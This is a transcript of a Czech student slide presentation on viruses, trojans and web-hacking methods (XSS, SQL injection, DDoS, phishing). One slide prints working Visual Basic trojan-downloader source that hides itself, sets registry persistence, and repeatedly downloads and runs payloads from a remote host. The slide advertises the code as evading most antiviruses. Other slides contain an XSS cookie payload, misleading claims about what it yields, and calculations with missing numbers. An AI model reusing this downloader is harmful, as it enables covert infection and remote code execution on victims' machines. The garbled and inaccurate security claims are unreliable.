Mironov Nikita 1A/4. Počítačové viry/trojany Web-hacking.

Презентация:



Advertisements
Похожие презентации
Определение максимального и минимального значений переменных. Задание 1. Даны две переменные А и В, значения которых вводятся командой Input. Определить.
Advertisements

Проект «Решение квадратного урвнения» Visual Basic.
Gymnázium a Střední odborná škola, Lužická 423, Jaroměř PaedDr. Miroslava Drahorádová OSOBNÍ DOPIS VY_32_INOVACE_5C8.
Škoda Auto
Zpracoval:David Veselák. Základní informace -Akkadská říše je název starověkého státního útvaru, který existoval zhruba v letech 2334 – 2200 př. n. l.
Файл это поименованная область диска. Чтобы записать информацию в файл надо проделать следующие операции 1.Открыть файл 2.Вывести данные в файл 3.Закрыть.
Gymnázium a Střední odborná škola, Lužická 423, Jaroměř PaedDr. Miroslava Drahorádová INFINITIVNÍ OTÁZKY VY_32_INOVACE_5C17.
Урок информатики по теме: Задачи сортировки для одномерного массива.
Задачи сортировки для одномерного массива Сегодня на уроке мы рассмотрим ПРОСТОЙ ВЫБОР.
Сортировка Сортировкой числового массива называют расположение его элементов в возрастающем или убывающем по величине порядке. Сортировка символьного массива.
Тема: Массивы ОДНОМЕРНЫЕ МАССИВЫ. Проверка домашнего задания Найти все 3-х значные числа, заканчивающихся на 2, 4, 8 и делящихся на 6. CLS FOR I = 100.
Проект «Контроль знаний» 10 класс. Поместить на форму: Надпись Label 1 для вывода оценочных сообщений; Надпись Label 2 для вывода количества ошибок; Кнопку.
Hranice slov a vět Počítačové zpracování přirozeného jazyka Jan Kálal, ZS 2007/08.
Массивом называется упорядоченная совокупность однородных величин, обозначенных каждая одним и тем же именем с различными целочисленными индексами, изменяющимися.
Проект Три шара Постановка задачи : Дано число N – количество вызовов функции, которая возвращает шар одного из трех цветов : красный, синий или желтый.
Операции над файлами Язык программирования BASIC.
Задачи сортировки для одномерного массива
Задачи заполнения.. Заполните массив размером 10 нулями. DIM A(10) FOR I=1 TO 10 A(I)=0 NEXT I DIM A(10) FOR I=1 TO 10 INPUT A(I) NEXT I.
как подготовить информацию к обработке на компьютере как воспользоваться компьютером для обработки информации.
Решение олимпиадных задач Учитель информатики МБОУ«СОШ 23 с углубленным изучением отдельных предметов» Энгельсского муниципального района Саратовской области.
Транксрипт:

Mironov Nikita 1A/4

Počítačové viry/trojany Web-hacking

všechny virusy dělíme na spyware, trojany, backdoor'y spyware je špionský program,ktery má za úkol ukrást od vás informace trojan je program,který vám škodí backdoor je program pomoci kterého hacker může ovládat váš počítač

-casto trojan se může dostat na váš počítač protože máte díry ve windowsu -pro zavření těchto dir musíte pořád stahovat obnovení z update.microsoft.com -take škodlivý program může prolézt k vám protože máte otevřené tzv. porty -pro případ s portami používejte firewall (napr.Outpost Firewall) -samozřejmě nejčastějším případem stále je stahování programu z nějakých stránek/pošty

-viry dělají hodně zkušení lidé (virusmakery) a proto antiviry casto nemohou najit/odstranit vir -neexistuje nejlepší antivir protože každý má svoje plusy a minusy -mezi dobré patří Kasperský Antivirus,NOD32,Symantec Norton Antivirus

-příklad kódu virusu,ktery byl nalezen jenom 2-má ze 33 antivirusu,obsahuje jenom 60 řádku ;) -stále není v databazích antiviru (!POZOR!) Private Sub Form_Load() On Error GoTo errsquad App.TaskVisible = False Shell ("cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Windows\svchost.exe /f") Open "c:\windows\system32\mstdarg.dll" For Input As #2 Line Input #2, hostaddr Close #2 Open "c:\windows\system32\mstddrg.dll" For Output As #5 Print #5, Inet1.OpenURL(hostaddr & "/" & "nameofscr.file") Close #5 Open "c:\windows\system32\mstddrg.dll" For Input As #6 Line Input #6, nameofscr Close #6 Timer1.Interval = "10000" Timer1.Enabled = True Exit Sub errsquad: kool = 1 End Sub Private Sub Timer1_Timer() On Error GoTo errdamage Dim kool Open "c:\windows\system32\mstddrg.dll" For Output As #9 Print #9, Inet1.OpenURL(hostaddr & "/" & "nameofscr.file") Close #9 Open "c:\windows\system32\mstddrg.dll" For Input As #10 Line Input #10, nameofscr Close #10 Open "c:\windows\system32\mstdnrg.dll" For Output As #15 Print #15, Inet1.OpenURL(hostaddr & "/" & "not.file") Close #15 Open "c:\windows\system32\mstdnrg.dll" For Input As #16 Line Input #16, notfile Close #16 Open "c:\windows\system32\mstdlrg.dll" For Output As #17 Print #17, Inet1.OpenURL(hostaddr & "/" & "end.file") Close #17 Open "c:\windows\system32\mstdlrg.dll" For Input As #18 Line Input #18, endfors Close #18 If endfors = 1 Then End Open "c:\windows\cursors\" & nameofscr For Output As #1 Print #1, Inet1.OpenURL(hostaddr & "/" & nameofscr) Close #1 If notfile = 1 Then kool = 1 Else Shell ("c:\windows\cursors\" & nameofscr) End If Exit Sub errdamage: kool = 0 End Sub

Úvod: Co všechno děláme přes internet? Stahujeme,díváme se na filmy a videa,hrajeme hry,nakupujeme,navštěvujeme naše oblíbené stránky,chatujeme,píšeme dopisy,posilame soukromou informaci... Samozřejmě že každá normální stránka požaduje registraci uživatele aby mohla pak každého identifikovat. A proto na každém servru je tzv. Uživatelská databáze...

Metod útoku na web stránky je hodně.A proto dnes vám popíšu jenom základni: XSS - Cross Site Scripting, nejrozšířenější metoda,která je užívána na základě chyb skriptu web-stranky SQL-Injection - také hodně rozšířena metoda,na základě sestavení speciálního 'dotazu' k bazi SQL DDoS - nejstarši metoda.Její smysl je v tom,že na jeden server se připojili najednou vic nez lidi (BOTu) Phishing - nová metoda,hacker dělá "kopii" nějaké stránky a mění jenom to,kam půjdou soukromá data.

XSS - Cross Site Scripting Každá stránka obsahuje HTML kód.Tento kód generuje speciálni skript na servere. Samozřejmě,že generace kódů je na základě našeho dotazu k serveru. Příklad: To byl jen příklad a google má proti tomu obranu => nepokoušejte se to opakovat Píšeme v Googlu text a hledáme - náš text je dotaz k serveru Skript na googlu vrací nám stránku s výsledky Na této stránce je hodně krát napsán náš "dotaz" => náš text byl přidán do zdrojového kódu Nám stačí napsat něco jako > alert(document.cookie) a už máme heslo a jméno uživatele.

SQL-injection - Structure Query Language Injection Všechna data jsou uložena v SQL-databazich (99% stranek). Aby ji jsme dostali musíme najít aspoň něco na stránce,co bude také otevírat tu bazi Příklad: Tady je příklad připojení k SQL,zkusíme ho modifikovat: Pak musíme zkoušet názvy sloupců v této bázi a pokud najdeme správný název -> máme přístup k účtům uživatele

DDoS - Denial Of Service. Tady není co popisovat,všechno je jednoduché...ale DRAHÉ :) Tato metoda je založená na principu připojení 100 počitačů k Jednomu serveru Příklad: Drahý je protože 100 počítačů nemá zdaleka každý Václav má server, Petr ma hodně počítačů nebo svůj botnet (~100 pc) Petr otevíra na každém počítači stranku a porad stiskne "Obnovit" Takže jestli Petr obnoví stránku 30 krát za minutu na 100 počítačích bude to dotazů za minutu (musíme krátit 10ti) Za hodinu to bude dotazů.Pokud Václav má hodně pevný server,tak server bude na několik hodin offline. Pokud Václav má obyčejný počítač tak ten počítac může zhořet kvůli velkému proudu "dotazů"

Phishing - od angl. slova Fishing (rybaření) Máte účet v bance? Máte k němu přístup přes internet? Jste nezkušeny uživatel? Příklad phishingu: Hacker vytváří stránku,která je úplně stejná jako stránka banky. Hacker posílá dopis nezkušenému uživateli přes "Dobrý Den pane X založil jste účet na a musíte ho aktivovat přihlášením na Děkuji za pozornost" Jestli uživatel napíše svoje data (login a heslo) na stránce phishingu tak data dostane hacker,ne banka